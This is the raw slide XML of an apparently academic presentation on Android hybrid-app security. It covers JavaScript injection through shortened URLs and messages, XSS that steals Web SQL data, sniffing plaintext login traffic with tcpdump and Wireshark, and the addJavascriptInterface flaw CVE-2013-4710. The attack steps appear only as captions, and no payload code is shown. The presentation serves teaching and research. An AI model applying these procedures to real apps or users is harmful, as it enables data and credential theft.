              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="3A81BA"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Shortened</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="3A81BA"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> URLs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="242" name="image1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919" y="706326"/>
            <a:ext cx="8660163" cy="40864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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657647" y="44234"/>
            <a:ext cx="3447906" cy="386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 algn="ctr" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2100" b="1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>
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1"/>
              <a:t>Attack Procedures </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Shape 245"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201384" y="513080"/>
            <a:ext cx="4423129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defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="3A81BA"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>SMS / Whatsapps / Facebook Messages / Emails</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="246" name="image1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277" y="885813"/>
            <a:ext cx="9041446" cy="38603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2657647" y="44234"/>
            <a:ext cx="3447906" cy="386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 algn="ctr" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2100" b="1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>
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1"/>
              <a:t>Attack Procedures </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Shape 249"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1404584" y="398779"/>
            <a:ext cx="4423129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defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="3A81BA"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>SMS / Whatsapps / Facebook Messages / Emails</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="250" name="image1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8217" y="675306"/>
            <a:ext cx="8387566" cy="4014810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hape 251"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267489" y="4742181"/>
            <a:ext cx="8480966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spcBef>
                <a:spcPts val="12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r>
              <a:t>Facebook Messenger and in-app browser, clicking the messages executed the XSS payload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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657647" y="18834"/>
            <a:ext cx="3447906" cy="386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 algn="ctr" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2100" b="1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>
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1"/>
              <a:t>Attack Procedures </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Shape 254"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1595085" y="462280"/>
            <a:ext cx="4506938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defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="3A81BA"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Stealing content from Web SQL Database by XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="255" name="image1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567" y="739057"/>
            <a:ext cx="9014867" cy="926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image1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567" y="1961995"/>
            <a:ext cx="9014867" cy="13712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image17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567" y="3784603"/>
            <a:ext cx="9014867" cy="648621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Shape 258"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1872112" y="1706881"/>
            <a:ext cx="5399776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spcBef>
                <a:spcPts val="12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r>
              <a:t>sample Web SQL was initiated, storing cities information </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Shape 259"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697926" y="3395981"/>
            <a:ext cx="5748146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spcBef>
                <a:spcPts val="12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r>
              <a:t>XSS vulnerability was injected in the code from QueryString </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Shape 260"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623182" y="4538981"/>
            <a:ext cx="7897634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spcBef>
                <a:spcPts val="12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r>
              <a:t>XSS Payload was inserted in URL to retrieve the first city name from the table “city”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>
            <a:off x="2657647" y="18834"/>
            <a:ext cx="3447906" cy="386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 algn="ctr" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2100" b="1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>
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1"/>
              <a:t>Attack Procedures </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Shape 263"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1595085" y="424180"/>
            <a:ext cx="4506938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defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="3A81BA"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Stealing content from Web SQL Database by XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="264" name="image1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85840"/>
            <a:ext cx="9144000" cy="3828895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Shape 265"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403023" y="4785362"/>
            <a:ext cx="6337952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spcBef>
                <a:spcPts val="12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r>
              <a:t>The city name of the first record was successfully retrieved by XSS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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657647" y="31534"/>
            <a:ext cx="3447906" cy="386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 algn="ctr" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2100" b="1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>
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1"/>
              <a:t>Attack Procedures </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Shape 268"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1607785" y="487680"/>
            <a:ext cx="3518942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defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="3A81BA"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Eavesdropping Mobile Website Traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="269" name="image1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33162"/>
            <a:ext cx="9144000" cy="3563397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Shape 270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="57263" y="4513440"/>
            <a:ext cx="9029472" cy="348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spcBef>
                <a:spcPts val="12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r>
              <a:t>Sample mobile website required user to login, and profile page was displayed after authentication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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657648" y="183934"/>
            <a:ext cx="3447904" cy="386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 algn="ctr" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2100" b="1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>
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1"/>
              <a:t>Attack Procedures </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Shape 273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1607785" y="741680"/>
            <a:ext cx="3518942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defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="3A81BA"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Eavesdropping Mobile Website Traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="274" name="image2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23444"/>
            <a:ext cx="9144000" cy="1156513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Shape 275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100350" y="2837181"/>
            <a:ext cx="8943299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spcBef>
                <a:spcPts val="12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r>
              <a:t>Tcpdump installed in the Android Emulator, it captured all the network traffic from the Emulator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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657648" y="31534"/>
            <a:ext cx="3447904" cy="386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 algn="ctr" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2100" b="1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>
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1"/>
              <a:t>Attack Procedures </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Shape 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1607785" y="436880"/>
            <a:ext cx="3518942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 defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="3A81BA"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>Eavesdropping Mobile Website Traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="279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19981"/>
            <a:ext cx="9144000" cy="3869036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Shape 280"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285362" y="4658362"/>
            <a:ext cx="8573275" cy="34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spcBef>
                <a:spcPts val="12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r>
              <a:t>The plaintext traffic was viewed by Wireshark, username and password were captured easily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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2721149" y="1542834"/>
            <a:ext cx="3447902" cy="474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 algn="ctr">
              <a:defRPr sz="2700"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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="283" name="image2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93016" y="2530985"/>
            <a:ext cx="1428603" cy="1428603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Shape 284"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3586495" y="4047637"/>
            <a:ext cx="2137800" cy="297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>
              <a:defRPr sz="1500"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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500"/>
              <a:t>Would you scan this?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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3049046" y="1848739"/>
            <a:ext cx="8616600" cy="8574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2">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="38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rPr>
              <a:t>Demo (Video)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Shape 287"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1291213" y="3028950"/>
            <a:ext cx="7282499" cy="347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>
              <a:defRPr sz="1800"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pPr lvl="0"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>www.cis.syr.edu/~wedu/android/JSCodeInjection/index.html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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>Outline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xfrm>
            <a:off x="457200" y="983298"/>
            <a:ext cx="8229600" cy="372570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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" b="1"/>
              <a:t>Background and motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Overall problem definition and challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Related work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Comparison between the two papers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Conclusions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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Shape 290"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="983298"/>
            <a:ext cx="8229600" cy="372570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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Background and motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Overall problem definition and challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" b="1"/>
              <a:t>Related work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Comparison between the two papers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Conclusions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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>Related work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Shape 29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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Hybrid Apps Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>‘addJavascriptInterface’ vulnerability. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>	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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>Hybrid apps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Shape 296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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>No Bridge Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>No Load Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>		 	 	 		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>					</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>	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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>Hybrid apps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="299" name="image2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6772" y="1319471"/>
            <a:ext cx="4788669" cy="3179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image2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98261" y="1433771"/>
            <a:ext cx="4698018" cy="30572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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>AddJavaScriptInterface Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="303" name="Screen Shot 2015-02-02 at 7.59.33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54718"/>
            <a:ext cx="9144000" cy="2330133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Shape 304"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5239698" y="4723132"/>
            <a:ext cx="3973203" cy="320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marL="190500" indent="-190500" defTabSz="457200">
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="0197B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0197B8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Google Android Vulnerability: CVE-2013-4710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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>AddJavaScriptInterface Vulnerability</a:t>
            </a:r>
